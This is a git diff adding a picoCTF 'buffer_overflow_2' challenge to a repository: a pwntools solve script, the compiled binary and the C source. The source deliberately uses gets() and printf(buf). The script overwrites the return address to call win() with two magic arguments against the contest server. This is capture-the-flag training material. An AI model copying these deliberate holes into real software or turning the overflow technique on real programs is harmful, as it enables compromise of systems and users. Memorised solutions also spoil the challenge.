diff --git a/pwn/buffer_overflow_2/solve.py b/pwn/buffer_overflow_2/solve.py new file mode 100755 index 0000000..b3dab5e --- /dev/null +++ b/pwn/buffer_overflow_2/solve.py @@ -0,0 +1,31 @@ +#!/usr/bin/env nix-shell +#!nix-shell -p python3 -i python3 python3Packages.pwntools + +from pwn import * + +exe = ELF("./vuln") + +context.binary = exe + +ADDR, PORT, *_ = "saturn.picoctf.net 55214".split() + +def conn(): + if args.REMOTE: + r = remote(ADDR, PORT) + else: + r = process([exe.path]) + + return r + +def main(): + r = conn() + + print(r.recvuntil(b"Please enter your string:")) + offset = 112 # found with pwndbg + payload = b'A' * offset + p32(exe.sym.win) + b'B'*4 + p32(0xCAFEF00D) + p32(0xF00DF00D) + r.sendline(payload) + print(r.recvall()) + r.close() + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/pwn/buffer_overflow_2/vuln b/pwn/buffer_overflow_2/vuln new file mode 100755 index 0000000..accb967 Binary files /dev/null and b/pwn/buffer_overflow_2/vuln differ diff --git a/pwn/buffer_overflow_2/vuln.c b/pwn/buffer_overflow_2/vuln.c new file mode 100644 index 0000000..60b8d31 --- /dev/null +++ b/pwn/buffer_overflow_2/vuln.c @@ -0,0 +1,43 @@ +#include +#include +#include +#include +#include + +#define BUFSIZE 100 +#define FLAGSIZE 64 + +void win(unsigned int arg1, unsigned int arg2) { + char buf[FLAGSIZE]; + FILE *f = fopen("flag.txt","r"); + if (f == NULL) { + printf("%s %s", "Please create 'flag.txt' in this directory with your", + "own debugging flag.\n"); + exit(0); + } + + fgets(buf,FLAGSIZE,f); + if (arg1 != 0xCAFEF00D) + return; + if (arg2 != 0xF00DF00D) + return; + printf(buf); +} + +void vuln(){ + char buf[BUFSIZE]; + gets(buf); + puts(buf); +} + +int main(int argc, char **argv){ + setvbuf(stdout, NULL, _IONBF, 0); + + gid_t gid = getegid(); + setresgid(gid, gid, gid); + + puts("Please enter your string: "); + vuln(); + return 0; +} +